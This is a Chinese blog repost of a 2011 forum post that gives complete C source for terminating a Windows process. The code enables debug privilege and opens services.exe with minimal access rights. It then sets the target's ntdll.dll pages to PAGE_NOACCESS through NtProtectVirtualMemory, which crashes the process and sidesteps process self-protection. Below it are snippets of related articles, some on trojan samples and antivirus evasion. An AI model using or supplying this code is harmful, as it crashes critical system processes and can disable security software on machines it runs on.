【转】利用NtProtectVirtualMemory结束进程

最新推荐文章于 2024-08-07 09:58:13 发布
最新推荐文章于 2024-08-07 09:58:13 发布
阅读量1.2k 收藏 1
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/Lthis/p/4207966.html
版权 
标 题 : 【原创】利用NtProtectVirtualMemory结束进程
作 者 : KiDebug
时 间 : 2011 - 07 - 13, 09 : 37 : 08
链 接 : http ://bbs.pediy.com/showthread.php?t=137067
 
原理很简单,用PROCESS_VM_OPERATION打开目标进程(没必要PROCESS_ALL_ACCESS),把目标进程的ntdll.dll设为不能访问
/*
* 【作者:KiDebug】
* 【空间:http://hi.baidu.com/KiDebug/】
*  VC 6.0编译出错请百度:“vc 6.0 unicode”
*/
#include <stdio.h>
#include <Windows.h>
#include <Psapi.h>
#include <Tlhelp32.h>
 
#pragma comment(lib,"Psapi.lib")
 
typedef NTSTATUS(__stdcall *RtlAdjustPrivilege_)(
ULONG Privilege,
BOOLEAN Enable,
BOOLEAN CurrentThread,
PBOOLEAN Enabled
);
RtlAdjustPrivilege_ RtlAdjustPrivilege = NULL;
 
typedef NTSTATUS(__stdcall *NtProtectVirtualMemory_)(
    __in HANDLE ProcessHandle,
    __inout PVOID *BaseAddress,
    __inout PSIZE_T RegionSize,
    __in ULONG NewProtectWin32,
    __out PULONG OldProtect
    );
NtProtectVirtualMemory_ NtProtectVirtualMemory = NULL;
 
ULONG GetPID(WCHAR* proc)
{
    BOOL                working = 0;
    PROCESSENTRY32      lppe = { 0 };
    ULONG               targetPid = 0;
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 
    if (hSnapshot)
    {
        lppe.dwSize = sizeof(lppe);
        working = Process32First(hSnapshot, &lppe);
        while (working)
        {
            if (_wcsicmp(lppe.szExeFile, proc) == 0)
            {
                targetPid = lppe.th32ProcessID;
                break;
            }
            working = Process32Next(hSnapshot, &lppe);
        }
    }
 
    CloseHandle(hSnapshot);
    return targetPid;
}
 
 
void main()
{
    HMODULE     ntdll;
    MODULEINFO  ModuleInfo;
    ntdll = GetModuleHandle(L"ntdll.dll");
    if (!GetModuleInformation((HANDLE)-1, ntdll, &ModuleInfo, sizeof(MODULEINFO)))
    {
        return;
    }
 
    BOOLEAN         Enabled;
    RtlAdjustPrivilege = (RtlAdjustPrivilege_)GetProcAddress(ntdll, "RtlAdjustPrivilege");
    if (RtlAdjustPrivilege == NULL)
    {
        return;
    }
 
    RtlAdjustPrivilege(20, TRUE, FALSE, &Enabled);
 
 
    HANDLE hProc = OpenProcess(PROCESS_VM_OPERATION, FALSE, GetPID(L"services.exe"));
    if (hProc == NULL)
    {
        return;
    }
 
    NtProtectVirtualMemory = (NtProtectVirtualMemory_)GetProcAddress(ntdll, "NtProtectVirtualMemory");
    if (NtProtectVirtualMemory == NULL)
    {
        return;
    }
 
    ULONG   OldProtect;
    NtProtectVirtualMemory(hProc, &ModuleInfo.lpBaseOfDll, &ModuleInfo.SizeOfImage, PAGE_NOACCESS, &OldProtect);
}

 

转载于:https://www.cnblogs.com/Lthis/p/4207966.html

donghua4539
关注
Winheap 利用的一个例子
qq_36495104的博客
07-24 368
原文链接 winhttpd writeup: private heaps pwning on Windows This challenge is running on Windows Server 2019, Version 1809 (OS Build 17763.253). 此次调试在win10上进行 10.0.19042.1083
利用Think远程代码执行漏洞进行脱库上传免杀木马情报
免费网络加-速-器游戏加/速/器
06-01 5979
1 详细说明 近日我捕获到一个利用Think远程代码执行漏洞进行脱库上传免杀木马的最新样本。样本文件名为http://acedgwf.cn/01/js.css(伪装加密后的php文件),直接打开后展示“js.css”(php语言加密代码)。如下图所示: Think远程代码执行漏洞 2 情报来源 经由地址http://acedgwf.cn/01/js.css捕获远控木马样本 3 样本分析 我将从以下三个步骤来进行情报提交:捕获样本情报→ 分析解密后门文件代码→分析域名资产和漏洞影响;...
32位和64位系统内核函数调用从ZwProtectVirtualMemoryNtProtectVirtualMemory
weixin_30624825的博客
09-01 1006
0x01 前言   我们知道R3层中,Zw系列函数和Nt系列函数函数是一样的,但是在内核Zw系列函数调用了Nt系列函数,但是为什么要在内核设置一个Zw系列函数而不是直接调用Nt函数呢?Zw系列函数又是怎么调用Nt系列函数的呢?我们利用IDA分析NtosKrnl.exe文件。 0x02 ZwProtectVirtualMemory   我们先看看ZwProtectVirtualMemor...
PsSetLoadImageNotifyRoutine回调函数中使用NtProtectVirtualMemory卡死原因
多媒体编程、网络编程、系统编程、网络安全编程、驱动编程
09-12 3174
dll加载的回调应该是在MiMapViewOfSection->MiMapViewOfImageSection里吧,首先在前者调用后者前 会KeAcquireGuardedMutex (&((PROCESS)->AddressCreationLock));来进行同步NtProtectVirtualMemory->MiProtectVirtualMemory也会使用宏LOCK_ADDRESS_SPA
游戏运行缺少d3d11怎么回事,DirectX修复工具解决d3d11缺少的步骤
最新发布
Cybertronnnnnn的博客
08-07 924
d3d11.dll在我们玩游戏的过程中,可能会遇到游戏运行时提示缺少d3d11.dll文件的情况。这一问题的出现,无疑会让游戏体验大打折扣。但别担心,下面将为大家分享一下解决办法。
VirtualProtect() 原理(摘自Undocument NT)
绝迹·危言的专栏
04-17 4353
<br />VirtualProtect() 函数并不将页标记为可读写,而是保持页的只读属性。 然而,为了将此页与其它的正常只读页取分开来,它被标记为写时拷贝(copy-on-write)。 Windows NT 使用了 PTE 中的一个空闲位来做这个标记。当此页被写入时,因为是只读页,处理器发出页错误异常。页错误处理程序做一份此页的拷贝并相应地修改发生页错误进程的列表。新的拷贝被标记为可读写以使进程可以写入。
(16)[系统调用]追踪系统调用(3环)
qq_50332504的博客
07-24 721
简单地进行WriteProcessMemory进行追踪,看看这个函数到底是怎么样运作的,结果真是......
用户层下API的逆向分析及重构
hongduilanjun的博客
03-10 956
Windows所提供给R3环的API,实质就是对操作系统接口的封装,其实现部分都是在R0实现的。很多恶意程序会利用钩子来钩取这些API,从而达到截取内容,修改数据的意图。现在我们使用ollydbg对ReadProcessMemory进行跟踪分析,查看其在R3的实现。 测试 od 我们首先在od里面跟一下在ring3层ReadProcessMemory的调用过程 首先在 exe 中 调用 kernel32.ReadProcessMemory函数,我们可以看到这一部分主要是call dword ptr ds:
进程创建流程
06-30 1997
;进程创建过程开始 CreateProcessAcall   kernel32!CreateProcessA ;10个参数; BOOL WINAPI CreateProcess(;   __in_opt     LPCTSTR lpApplicationName,;   __inout_opt  LPTSTR lpCommandLine,;   __in_opt     L
CreateProcess进程创建的内核跟踪分析
zjw1989
09-12 1009
<br />*[标题]:CreateProcess进程创建的内核跟踪分析<br />*[作者]:gz1X [gz1x(at)tom(dot)com]<br />*[来自]:中国黑客联盟 [CHU]<br /><br />    <br />*[正文]:<br /><br /><br />[实现流程]<br />——————————————————————<br />1.打开需要执行的文件(.exe);<br />2.创建执行体进程对象; //<-------重点<br />3.创建初始线程; /
利用 RtlWalkFrameChain 回溯调用堆栈
06-03
学习到的知识:。通过RtlWalkFrameChain 回溯调用堆栈。通过NtQueryVirtualMemory 查询模块句柄与模块名。@pxiu。
红队开发基础-基础免杀
include_voidmain的博客
06-28 947
红队开发基础-基础免杀
Nt内核函数大全
huang714的专栏
04-29 1515
Nt内核函数大全 NtLoadDriver 服务控制管理器加载设备驱动. NtUnloadDriver 服务控制管理器支持卸载指定的驱动程序. NtRegisterNewDevice 加载新驱动文件. NtQueryIntervalProfile 返回数据. NtSetIntervalProfile 指定采样间隔. NtStartProfile 开始取样. NtStopProfile 停止采样...
NtTerminateProcess 终止进程
weixin_30699235的博客
12-07 818
用NtTerminateProcess真正终止进程. 首先,要使用Native API,要对它进行声名: typedef DWORD (CALLBACK* NTTERMINATEPROCESS)(HANDLE,UINT);NTTERMINATEPROCESS NtTerminateProcess;HMODULE hNtdll = NULL; hNtdll = LoadLibrary( "...
内核级结束进程c代码
xinew的专栏
10-11 2119
  #include     #include     #include    #include     #pragma comment (lib,"ntdll.lib")    // Copy From DDK    #pragma comment (lib,"Kernel32.lib")    #pragma comment (lib,"Advapi32.l
浅析360在系统的进程自保护及突破
weixin_33728708的博客
12-04 302
自从改行玩硬件后,就很少关注病毒和反病毒之间的斗争了。某天在中关村论坛听到一 名网友说 360在WIN64 上有了进程自我保护,万分牛逼,连微软的Process Explorer都不 能结束呢!我听后心里十分好奇,于是重操旧业,下载了最新版本的360 安全卫士7.7版本 (2011-5-6),安装在64位 Windows 7虚拟机上来测试。 首先拿“任务管理器”...
结束进程的几种方法
ANSWER 的专栏
02-04 2181
 释放驱动HOOK了SSDT表中的NtOpenProcess,但是对参数过滤不严密,只过滤   PROCESS_TERMINATE, PROCESS_WRITE, XXXX(忘记了),,三种.然后比较的PID是放在全局变量中,可以通过发送 DeviceIoControl 改变这个值~所以我们还是可以以其他的参数打开这个进程的(只要不含有那三个参数)~不过大家似乎都不感兴趣这个题目,于是代码就不放了
进程方法大全
zzmzzff的博客
03-05 3341
Windows下杀进程22种方法: '1.结束进程 (参数:进程ID) Sub KillProcess(ByVal dwProcessId As Long) SetDebug '提权 Dim hProcess As Long '方法1,使用普通API hProcess = OpenProcess(PROCESS_TE...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值